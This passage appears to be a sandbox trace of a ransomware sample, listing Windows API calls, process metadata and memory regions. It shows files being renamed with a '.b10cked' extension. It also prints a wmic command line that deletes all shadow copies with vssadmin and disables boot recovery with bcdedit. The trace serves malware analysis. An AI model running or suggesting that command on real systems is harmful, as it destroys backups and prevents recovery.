0x0 [0159.862] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x12eb74, lpData=0x12eb78, lpcbData=0x12eb70*=0x1000 | out: lpType=0x12eb74*=0x0, lpData=0x12eb78*=0x9, lpcbData=0x12eb70*=0x1000) returned 0x2 [0159.862] RegCloseKey (hKey=0x40) 
returned 0x0 [0159.862] time (in: timer=0x0 | out: timer=0x0) returned 0x5b886382 [0159.862] srand (_Seed=0x5b886382) [0159.862] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\VISBRR~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\VISBRRES.DLL.trx_dll.b10cked\"" [0159.862] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\VISBRR~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\VISBRRES.DLL.trx_dll.b10cked\"" [0159.862] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0159.863] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x331970, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0159.863] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0159.863] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0159.863] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0159.863] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0159.863] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0159.863] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0159.863] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0159.863] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0159.863] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0159.863] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0159.863] 
_wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0159.863] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0159.864] GetEnvironmentStringsW () returned 0x332360* [0159.864] FreeEnvironmentStringsW (penv=0x332360) returned 1 [0159.864] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0159.864] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0159.864] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0159.864] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0159.864] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0159.864] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0159.864] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0159.864] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0159.864] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0159.864] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0159.864] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x12f938 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0159.864] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x12f938, lpFilePart=0x12f934 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x12f934*="Desktop") returned 0x18 [0159.864] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0159.864] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x12f6b4 | out: lpFindFileData=0x12f6b4) returned 0x3309f0 [0159.865] FindClose (in: hFindFile=0x3309f0 | out: hFindFile=0x3309f0) returned 1 [0159.865] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x12f6b4 | out: lpFindFileData=0x12f6b4) returned 0x3309f0 [0159.865] FindClose (in: 
hFindFile=0x3309f0 | out: hFindFile=0x3309f0) returned 1 [0159.865] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x12f6b4 | out: lpFindFileData=0x12f6b4) returned 0x3309f0 [0159.865] FindClose (in: hFindFile=0x3309f0 | out: hFindFile=0x3309f0) returned 1 [0159.865] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0159.865] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0159.865] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0159.865] GetEnvironmentStringsW () returned 0x330210* [0159.865] FreeEnvironmentStringsW (penv=0x330210) returned 1 [0159.866] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0159.866] GetConsoleOutputCP () returned 0x1b5 [0159.866] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0159.866] GetUserDefaultLCID () returned 0x409 [0159.867] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0159.867] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x12fa78, cchData=128 | out: lpLCData="0") returned 2 [0159.867] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x12fa78, cchData=128 | out: lpLCData="0") returned 2 [0159.867] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x12fa78, cchData=128 | out: lpLCData="1") returned 2 [0159.867] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0159.867] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0159.867] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0159.867] GetLocaleInfoW (in: Locale=0x409, 
LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0159.867] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0159.867] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0159.867] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0159.867] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0159.867] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0159.867] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0159.867] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0159.868] GetConsoleTitleW (in: lpConsoleTitle=0x320930, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0159.868] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0159.868] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0159.869] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0159.869] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0159.869] _wcsicmp (_String1="move", _String2=")") returned 68 [0159.870] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0159.870] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0159.870] _wcsicmp (_String1="IF", _String2="move") returned -4 [0159.870] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0159.870] _wcsicmp (_String1="REM", _String2="move") returned 5 [0159.870] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0159.874] GetConsoleTitleW (in: lpConsoleTitle=0x12f770, nSize=0x104 | out: 
lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0159.874] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0159.874] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0159.874] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0159.874] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0159.874] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0159.874] _wcsicmp (_String1="move", _String2="CD") returned 10 [0159.874] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0159.874] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0159.874] _wcsicmp (_String1="move", _String2="REN") returned -5 [0159.874] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0159.874] _wcsicmp (_String1="move", _String2="SET") returned -6 [0159.874] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0159.874] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0159.874] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0159.874] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0159.875] _wcsicmp (_String1="move", _String2="MD") returned 11 [0159.875] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0159.875] _wcsicmp (_String1="move", _String2="RD") returned -5 [0159.875] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0159.875] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0159.875] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0159.875] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0159.875] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0159.875] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0159.875] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0159.875] _wcsicmp (_String1="move", _String2="VER") returned -9 [0159.875] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0159.875] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0159.875] _wcsicmp (_String1="move", _String2="SETLOCAL") returned 
-6 [0159.875] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0159.875] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0159.875] _wcsicmp (_String1="move", _String2="START") returned -6 [0159.875] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0159.875] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0159.875] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0159.877] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0159.877] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0159.877] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x12f52c, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x12f524, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x12f524*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0159.877] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0159.877] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0159.877] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0159.877] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0159.877] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0159.877] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0159.877] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0159.877] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0159.878] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0159.878] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0159.878] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0159.878] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", 
_MaxCount=0x7) returned -11 [0159.878] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0159.878] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0159.878] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0159.878] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0159.878] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0159.878] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0159.878] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0159.878] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0159.878] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0159.878] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0159.878] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0159.878] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0159.878] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0159.878] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0159.878] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0159.878] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0159.878] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0159.878] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0159.878] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0159.878] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0159.879] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0159.879] _wcsicmp (_String1="VISBRR~1.TRX", _String2=".") returned 72 [0159.879] _wcsicmp 
(_String1="VISBRR~1.TRX", _String2="..") returned 72 [0159.879] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\VISBRR~1.TRX" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036\\visbrr~1.trx")) returned 0x2020 [0159.879] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x331f20 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0159.879] SetErrorMode (uMode=0x0) returned 0x0 [0159.879] SetErrorMode (uMode=0x1) returned 0x0 [0159.879] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\VISBRR~1.TRX", nBufferLength=0x104, lpBuffer=0x12eeb4, lpFilePart=0x12ee9c | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\VISBRR~1.TRX", lpFilePart=0x12ee9c*="VISBRR~1.TRX") returned 0x3c [0159.879] SetErrorMode (uMode=0x0) returned 0x1 [0159.879] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036")) returned 0x2012 [0159.879] _wcsicmp (_String1="VISBRR~1.TRX", _String2=".") returned 72 [0159.880] _wcsicmp (_String1="VISBRR~1.TRX", _String2="..") returned 72 [0159.880] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\VISBRR~1.TRX" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036\\visbrr~1.trx")) returned 0x2020 [0159.880] SetErrorMode (uMode=0x0) returned 0x0 [0159.880] SetErrorMode (uMode=0x1) returned 0x0 [0159.880] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\VISBRR~1.TRX", nBufferLength=0x104, lpBuffer=0x12f330, lpFilePart=0x12f0c8 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\VISBRR~1.TRX", lpFilePart=0x12f0c8*="VISBRR~1.TRX") returned 0x3c [0159.880] SetErrorMode (uMode=0x0) returned 0x1 [0159.880] SetErrorMode (uMode=0x0) returned 0x0 [0159.880] SetErrorMode (uMode=0x1) returned 0x0 [0159.880] GetFullPathNameW (in: 
lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\VISBRRES.DLL.trx_dll.b10cked", nBufferLength=0x104, lpBuffer=0x12f538, lpFilePart=0x12f0c8 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\VISBRRES.DLL.trx_dll.b10cked", lpFilePart=0x12f0c8*="VISBRRES.DLL.trx_dll.b10cked") returned 0x4c [0159.880] SetErrorMode (uMode=0x0) returned 0x1 [0159.880] SetLastError (dwErrCode=0x0) [0159.880] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\VISBRRES.DLL.trx_dll.b10cked" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036\\visbrres.dll.trx_dll.b10cked")) returned 0xffffffff [0159.880] GetLastError () returned 0x2 [0159.880] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\VISBRR~1.TRX", fInfoLevelId=0x1, lpFindFileData=0x12ea44, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x12ea44) returned 0x332130 [0159.881] FindNextFileW (in: hFindFile=0x332130, lpFindFileData=0x12ea44 | out: lpFindFileData=0x12ea44) returned 0 [0159.881] GetLastError () returned 0x12 [0159.881] FindClose (in: hFindFile=0x332130 | out: hFindFile=0x332130) returned 1 [0159.883] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\VISBRR~1.TRX", fInfoLevelId=0x1, lpFindFileData=0x331cc0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x331cc0) returned 0x332130 [0159.883] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\VISBRRES.DLL.trx_dll.b10cked", nBufferLength=0x104, lpBuffer=0x12ecdc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\VISBRRES.DLL.trx_dll.b10cked", lpFilePart=0x0) returned 0x4c [0159.883] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\VISBRRES.DLL.trx_dll", nBufferLength=0x104, lpBuffer=0x12ecdc, lpFilePart=0x0 | out: 
lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\VISBRRES.DLL.trx_dll", lpFilePart=0x0) returned 0x44 [0159.883] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\VISBRRES.DLL.trx_dll" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036\\visbrres.dll.trx_dll")) returned 0x2020 [0159.884] MoveFileExW (lpExistingFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\VISBRRES.DLL.trx_dll" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036\\visbrres.dll.trx_dll"), lpNewFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\VISBRRES.DLL.trx_dll.b10cked" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036\\visbrres.dll.trx_dll.b10cked"), dwFlags=0x3) returned 1 [0159.885] FindClose (in: hFindFile=0x332130 | out: hFindFile=0x332130) returned 1 [0159.885] _vsnwprintf (in: _Buffer=0x4a9e5040, _BufferCount=0x103, _Format="%9d", _ArgList=0x12ec90 | out: _Buffer=" 1") returned 9 [0159.885] _get_osfhandle (_FileHandle=1) returned 0x7 [0159.885] GetFileType (hFile=0x7) returned 0x2 [0159.885] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0159.885] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x12ec1c | out: lpMode=0x12ec1c) returned 1 [0159.885] _get_osfhandle (_FileHandle=1) returned 0x7 [0159.885] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x12ec50 | out: lpConsoleScreenBufferInfo=0x12ec50) returned 1 [0159.885] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) moved.\r\n") returned 0x13 [0159.886] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x12ec90 | out: lpBuffer=" 1 file(s) moved.\r\n") returned 0x1a [0159.886] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x1a, 
lpNumberOfCharsWritten=0x12ec74, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x12ec74*=0x1a) returned 1 [0159.886] _get_osfhandle (_FileHandle=1) returned 0x7 [0159.886] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0159.886] _get_osfhandle (_FileHandle=1) returned 0x7 [0159.886] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0159.886] _get_osfhandle (_FileHandle=0) returned 0x3 [0159.887] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0159.887] SetConsoleInputExeNameW () returned 0x1 [0159.887] GetConsoleOutputCP () returned 0x1b5 [0159.887] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0159.887] SetThreadUILanguage (LangId=0x0) returned 0x409 [0159.887] exit (_Code=0) Process: id = "271" image_name = "wmic.exe" filename = "c:\\windows\\system32\\wbem\\wmic.exe" page_root = "0x7ea16ce0" os_pid = "0xf38" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "59" os_parent_pid = "0xe7c" cmd_line = "wmic.exe process call create \"cmd.exe /c vssadmin.exe delete shadows /all /quiet & bcdedit.exe /set {default} recoveryenabled no & bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 22031 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 22032 start_va = 0x30000 end_va = 0x33fff 
entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 22033 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 22034 start_va = 0x90000 end_va = 0xcffff entry_point = 0x0 region_type = private name = "private_0x0000000000090000" filename = "" Region: id = 22035 start_va = 0x870000 end_va = 0x8d2fff entry_point = 0x870000 region_type = mapped_file name = "wmic.exe" filename = "\\Windows\\System32\\wbem\\WMIC.exe" (normalized: "c:\\windows\\system32\\wbem\\wmic.exe") Region: id = 22036 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 22037 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 22038 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 22039 start_va = 0x7ffd3000 end_va = 0x7ffd3fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd3000" filename = "" Region: id = 22040 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 22065 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 22066 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 22067 start_va = 0xd0000 end_va = 0x136fff entry_point = 0xd0000 region_type = mapped_file name = "locale.nls" filename = 
"\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 22068 start_va = 0x1f0000 end_va = 0x2effff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 22069 start_va = 0x2f0000 end_va = 0x3b7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 22070 start_va = 0x470000 end_va = 0x47ffff entry_point = 0x0 region_type = private name = "private_0x0000000000470000" filename = "" Region: id = 22071 start_va = 0x6f920000 end_va = 0x6f954fff entry_point = 0x6f920000 region_type = mapped_file name = "framedynos.dll" filename = "\\Windows\\System32\\framedynos.dll" (normalized: "c:\\windows\\system32\\framedynos.dll") Region: id = 22072 start_va = 0x737c0000 end_va = 0x737c6fff entry_point = 0x737c0000 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 22073 start_va = 0x737d0000 end_va = 0x737ebfff entry_point = 0x737d0000 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 22074 start_va = 0x73d60000 end_va = 0x73d6cfff entry_point = 0x73d60000 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 22075 start_va = 0x75290000 end_va = 0x75297fff entry_point = 0x75290000 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\System32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll") Region: id = 22076 start_va = 0x752b0000 end_va = 